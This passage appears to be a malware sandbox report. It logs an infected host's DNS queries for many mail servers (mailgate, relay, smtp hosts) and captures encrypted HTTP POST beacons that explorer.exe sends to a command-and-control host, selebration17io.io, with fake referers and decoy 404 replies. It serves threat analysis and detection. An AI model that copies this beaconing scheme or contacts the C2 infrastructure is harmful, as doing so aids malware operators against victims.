Feb 21, 2024 00:26:20.034457922 CET	1.1.1.1	192.168.2.6	0x1a4a	No error (0)	architettosangiorgio-ch.mail.protection.outlook.com		104.47.22.74	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.034457922 CET	1.1.1.1	192.168.2.6	0x1a4a	No error (0)	architettosangiorgio-ch.mail.protection.outlook.com		104.47.22.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.160448074 CET	1.1.1.1	192.168.2.6	0x1779	Name error (3)	pop.joaz.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.413058996 CET	1.1.1.1	192.168.2.6	0x87c6	No error (0)	pharmacievp-fr02c.mail.protection.outlook.com		104.47.25.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.413058996 CET	1.1.1.1	192.168.2.6	0x87c6	No error (0)	pharmacievp-fr02c.mail.protection.outlook.com		104.47.24.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.500233889 CET	1.1.1.1	192.168.2.6	0xc32a	Name error (3)	smtp.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.731528997 CET	1.1.1.1	192.168.2.6	0x93bb	No error (0)	ftp.eskimo.ch		217.26.61.200	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.813153982 CET	1.1.1.1	192.168.2.6	0xc6d1	Name error (3)	mailgate.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.814378023 CET	1.1.1.1	192.168.2.6	0x7618	Name error (3)	mailgate.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.814675093 CET	1.1.1.1	192.168.2.6	0x6aae	Name error (3)	mailgate.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.816523075 CET	1.1.1.1	192.168.2.6	0x8def	Name error (3)	mailgate.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.823648930 CET	1.1.1.1	192.168.2.6	0x1caa	Name error (3)	mailgate.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.825526953 CET	1.1.1.1	192.168.2.6	0x87cd	Name error (3)	mailgate.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.825839996 CET	1.1.1.1	192.168.2.6	0xfa1b	Name error (3)	mailgate.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.841630936 CET	1.1.1.1	192.168.2.6	0xade8	Name error (3)	mailgate.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.854291916 CET	1.1.1.1	192.168.2.6	0xcd4c	Name error (3)	mailgate.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.877065897 CET	1.1.1.1	192.168.2.6	0x34e1	Name error (3)	mailgate.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.894608021 CET	1.1.1.1	192.168.2.6	0x7eb7	Name error (3)	mailgate.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.921920061 CET	1.1.1.1	192.168.2.6	0xdae3	Name error (3)	mailgate.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.939428091 CET	1.1.1.1	192.168.2.6	0x1534	Name error (3)	mailgate.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.947022915 CET	1.1.1.1	192.168.2.6	0xbf93	Name error (3)	mailgate.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.970155954 CET	1.1.1.1	192.168.2.6	0x10e3	Name error (3)	mailgate.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.052612066 CET	1.1.1.1	192.168.2.6	0x5a0	Name error (3)	mailgate.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.147659063 CET	1.1.1.1	192.168.2.6	0x7b25	Name error (3)	mailgate.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.805824995 CET	1.1.1.1	192.168.2.6	0x4aa7	Name error (3)	relay.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.807782888 CET	1.1.1.1	192.168.2.6	0x2fc4	Name error (3)	relay.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.808664083 CET	1.1.1.1	192.168.2.6	0xda1c	Name error (3)	mailgate.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.809320927 CET	1.1.1.1	192.168.2.6	0xfa20	Name error (3)	mailgate.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.812977076 CET	1.1.1.1	192.168.2.6	0xa7a9	Name error (3)	relay.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.815948009 CET	1.1.1.1	192.168.2.6	0x4418	Name error (3)	mailgate.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.818809986 CET	1.1.1.1	192.168.2.6	0x7687	Name error (3)	mailgate.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.818871975 CET	1.1.1.1	192.168.2.6	0x31c7	Name error (3)	mailgate.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.824067116 CET	1.1.1.1	192.168.2.6	0xf1fd	Name error (3)	relay.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.827933073 CET	1.1.1.1	192.168.2.6	0x3dd4	Name error (3)	mailgate.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.851165056 CET	1.1.1.1	192.168.2.6	0x9140	Name error (3)	mailgate.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.854490995 CET	1.1.1.1	192.168.2.6	0x2689	Name error (3)	mailgate.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.854561090 CET	1.1.1.1	192.168.2.6	0x3f95	Name error (3)	mailgate.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.855690002 CET	1.1.1.1	192.168.2.6	0x6451	Name error (3)	mailgate.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.863337994 CET	1.1.1.1	192.168.2.6	0x10b9	Server failure (2)	mailgate.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.892952919 CET	1.1.1.1	192.168.2.6	0xc599	Name error (3)	mailgate.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.894340992 CET	1.1.1.1	192.168.2.6	0xcedd	Name error (3)	mailgate.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.894809008 CET	1.1.1.1	192.168.2.6	0x182f	Name error (3)	mailgate.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.896089077 CET	1.1.1.1	192.168.2.6	0xee3e	Name error (3)	mailgate.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.896452904 CET	1.1.1.1	192.168.2.6	0x77cc	Name error (3)	mailgate.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.897496939 CET	1.1.1.1	192.168.2.6	0x5553	Name error (3)	mailgate.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.898574114 CET	1.1.1.1	192.168.2.6	0x27c8	Name error (3)	mailgate.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.901556015 CET	1.1.1.1	192.168.2.6	0x6358	Name error (3)	relay.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.901683092 CET	1.1.1.1	192.168.2.6	0xc613	Name error (3)	pop3.joaz.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.932888031 CET	1.1.1.1	192.168.2.6	0x900d	Name error (3)	mailgate.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.975457907 CET	1.1.1.1	192.168.2.6	0x3947	Name error (3)	relay.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.981937885 CET	1.1.1.1	192.168.2.6	0x7c8b	Name error (3)	smtp.joaz.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.047961950 CET	1.1.1.1	192.168.2.6	0xda15	Name error (3)	mailgate.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.108577967 CET	1.1.1.1	192.168.2.6	0x62be	Name error (3)	mailgate.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.137000084 CET	1.1.1.1	192.168.2.6	0xc957	Name error (3)	relay.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.158050060 CET	1.1.1.1	192.168.2.6	0x875e	No error (0)	ftp.mlbx.matrix.jp	mlbx.matrix.jp		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:22.158050060 CET	1.1.1.1	192.168.2.6	0x875e	No error (0)	mlbx.matrix.jp		59.106.13.100	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.165136099 CET	1.1.1.1	192.168.2.6	0x6ae4	Name error (3)	mailgate.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.203197002 CET	1.1.1.1	192.168.2.6	0x7835	Name error (3)	relay.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.281204939 CET	1.1.1.1	192.168.2.6	0xb3d7	Name error (3)	relay.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.306967020 CET	1.1.1.1	192.168.2.6	0x645f	No error (0)	imp.ovh.net	ns0.ovh.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:22.306967020 CET	1.1.1.1	192.168.2.6	0x645f	No error (0)	ns0.ovh.net		193.70.18.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.349677086 CET	1.1.1.1	192.168.2.6	0xe3c	Name error (3)	relay.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.365171909 CET	1.1.1.1	192.168.2.6	0x320d	Name error (3)	relay.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.528947115 CET	1.1.1.1	192.168.2.6	0x6f4d	Name error (3)	relay.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.549447060 CET	1.1.1.1	192.168.2.6	0x7b21	Name error (3)	relay.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.786434889 CET	1.1.1.1	192.168.2.6	0xe290	No error (0)	ssh.b4l-clan.de		127.0.0.1	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.790635109 CET	1.1.1.1	192.168.2.6	0x7e3e	Name error (3)	relay.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.822946072 CET	1.1.1.1	192.168.2.6	0x6186	Name error (3)	relay.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.899921894 CET	1.1.1.1	192.168.2.6	0xfa63	Name error (3)	relay.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.984318018 CET	1.1.1.1	192.168.2.6	0x3f1d	Name error (3)	relay.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.026761055 CET	1.1.1.1	192.168.2.6	0x6998	Name error (3)	relay.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.052330017 CET	1.1.1.1	192.168.2.6	0xea99	Name error (3)	relay.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.078994989 CET	1.1.1.1	192.168.2.6	0xbdf9	Name error (3)	relay.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.112952948 CET	1.1.1.1	192.168.2.6	0xed28	Name error (3)	relay.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.119496107 CET	1.1.1.1	192.168.2.6	0x3552	Name error (3)	relay.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.156239986 CET	1.1.1.1	192.168.2.6	0xad49	Name error (3)	relay.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.169222116 CET	1.1.1.1	192.168.2.6	0x4597	No error (0)	cfgteam-com.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.169222116 CET	1.1.1.1	192.168.2.6	0x4597	No error (0)	cfgteam-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.197592974 CET	1.1.1.1	192.168.2.6	0x9ef2	Name error (3)	relay.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.202302933 CET	1.1.1.1	192.168.2.6	0x6e2a	Name error (3)	relay.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.224231005 CET	1.1.1.1	192.168.2.6	0xeb65	Name error (3)	relay.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.229168892 CET	1.1.1.1	192.168.2.6	0x1e45	Name error (3)	relay.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.240447044 CET	1.1.1.1	192.168.2.6	0xa909	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.8	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.240447044 CET	1.1.1.1	192.168.2.6	0xa909	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.240447044 CET	1.1.1.1	192.168.2.6	0xa909	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.22	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.240447044 CET	1.1.1.1	192.168.2.6	0xa909	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.5	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.240447044 CET	1.1.1.1	192.168.2.6	0xa909	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.6	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.240447044 CET	1.1.1.1	192.168.2.6	0xa909	No error (0)	markoren-no.mail.protection.outlook.com		52.101.68.12	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.240447044 CET	1.1.1.1	192.168.2.6	0xa909	No error (0)	markoren-no.mail.protection.outlook.com		52.101.73.30	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.272176027 CET	1.1.1.1	192.168.2.6	0xa998	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.27	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.272176027 CET	1.1.1.1	192.168.2.6	0xa998	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.272176027 CET	1.1.1.1	192.168.2.6	0xa998	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.272176027 CET	1.1.1.1	192.168.2.6	0xa998	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.30	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.272176027 CET	1.1.1.1	192.168.2.6	0xa998	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.5	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.272176027 CET	1.1.1.1	192.168.2.6	0xa998	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.73.26	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.272176027 CET	1.1.1.1	192.168.2.6	0xa998	No error (0)	glazingbt-com01i.mail.protection.outlook.com		52.101.68.3	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.274219036 CET	1.1.1.1	192.168.2.6	0xd9ee	Server failure (2)	imap.att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.274231911 CET	1.1.1.1	192.168.2.6	0xd9ee	Server failure (2)	imap.att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.274243116 CET	1.1.1.1	192.168.2.6	0xd9ee	Server failure (2)	imap.att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.338311911 CET	1.1.1.1	192.168.2.6	0x41e1	Server failure (2)	relay.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.353971958 CET	1.1.1.1	192.168.2.6	0x49bd	No error (0)	mx4.netregistry.net		202.124.241.196	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.389060974 CET	1.1.1.1	192.168.2.6	0x901	Name error (3)	relay.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.404330969 CET	1.1.1.1	192.168.2.6	0xea9d	Name error (3)	relay.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.405977011 CET	1.1.1.1	192.168.2.6	0xaabc	Name error (3)	mailgate.joaz.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.409960985 CET	1.1.1.1	192.168.2.6	0xeff3	Name error (3)	relay.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.409976006 CET	1.1.1.1	192.168.2.6	0x920c	Name error (3)	relay.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.413958073 CET	1.1.1.1	192.168.2.6	0x8f69	Name error (3)	relay.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.413997889 CET	1.1.1.1	192.168.2.6	0x56fd	Name error (3)	relay.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.414011002 CET	1.1.1.1	192.168.2.6	0xe842	Name error (3)	relay.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.415478945 CET	1.1.1.1	192.168.2.6	0xd606	Name error (3)	relay.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.464361906 CET	1.1.1.1	192.168.2.6	0x5c85	Name error (3)	mailgate.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.557241917 CET	1.1.1.1	192.168.2.6	0x44cf	Name error (3)	relay.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.823693991 CET	1.1.1.1	192.168.2.6	0x3249	Name error (3)	relay.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.844356060 CET	1.1.1.1	192.168.2.6	0xa057	Name error (3)	relay.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.865379095 CET	1.1.1.1	192.168.2.6	0x3bd5	Name error (3)	relay.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.897231102 CET	1.1.1.1	192.168.2.6	0x96ef	Name error (3)	relay.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:24.025651932 CET	1.1.1.1	192.168.2.6	0xe5f2	Name error (3)	relay.joaz.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:24.082142115 CET	1.1.1.1	192.168.2.6	0x86bb	Name error (3)	relay.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:24.101928949 CET	1.1.1.1	192.168.2.6	0x3d91	Name error (3)	relay.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.148210049 CET	1.1.1.1	192.168.2.6	0xe8be	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.41.4	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.148210049 CET	1.1.1.1	192.168.2.6	0xe8be	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.41.6	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.148210049 CET	1.1.1.1	192.168.2.6	0xe8be	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.8.36	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.148210049 CET	1.1.1.1	192.168.2.6	0xe8be	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.9.2	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.148210049 CET	1.1.1.1	192.168.2.6	0xe8be	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.11.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.148210049 CET	1.1.1.1	192.168.2.6	0xe8be	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.9.17	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.148210049 CET	1.1.1.1	192.168.2.6	0xe8be	No error (0)	gmcocorp-com.mail.protection.outlook.com		52.101.10.2	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.151412010 CET	1.1.1.1	192.168.2.6	0x11bf	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.41.0	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.151412010 CET	1.1.1.1	192.168.2.6	0x11bf	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.40.6	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.151412010 CET	1.1.1.1	192.168.2.6	0x11bf	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.8.44	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.151412010 CET	1.1.1.1	192.168.2.6	0x11bf	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.10.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.151412010 CET	1.1.1.1	192.168.2.6	0x11bf	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.41.3	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.151412010 CET	1.1.1.1	192.168.2.6	0x11bf	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.8.34	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.151412010 CET	1.1.1.1	192.168.2.6	0x11bf	No error (0)	blauthlaw-com.mail.protection.outlook.com		52.101.11.7	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:27.253381014 CET	1.1.1.1	192.168.2.6	0xffce	Server failure (2)	mailgate.att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:27.253396034 CET	1.1.1.1	192.168.2.6	0xffce	Server failure (2)	mailgate.att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:27.253407001 CET	1.1.1.1	192.168.2.6	0xffce	Server failure (2)	mailgate.att.co.id	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49706	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:22:23.606236935 CET	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ycrspbudlggeh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: selebration17io.io
Feb 21, 2024 00:22:23.606295109 CET	298	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ab e9 56 eb Data Ascii: H;YWXr Vw#kqD/jqJ,,P;}f=B!bOVl/-swgb3{#fe{'[&7sc}\d(UMj6o"(vgidh-/G.]zavJ[s-hJ9\;wq"b3
Feb 21, 2024 00:22:23.835544109 CET	195	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:22:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 0d 0a 04 00 00 00 1f 3d 5a e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 8=Z0
Feb 21, 2024 00:22:23.842124939 CET	287	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gkquxeqtjibfvjb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: selebration17io.io
Feb 21, 2024 00:22:23.842154980 CET	214	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 83 df 0e c6 Data Ascii: H;YWXr Vw#kqD/jqJ,,P;}f=B!bO0swK)e\|F f,Jp0}z:v#[wJ#GSSy":OtL [+n+~.[GZ
Feb 21, 2024 00:22:24.069737911 CET	604	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:22:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
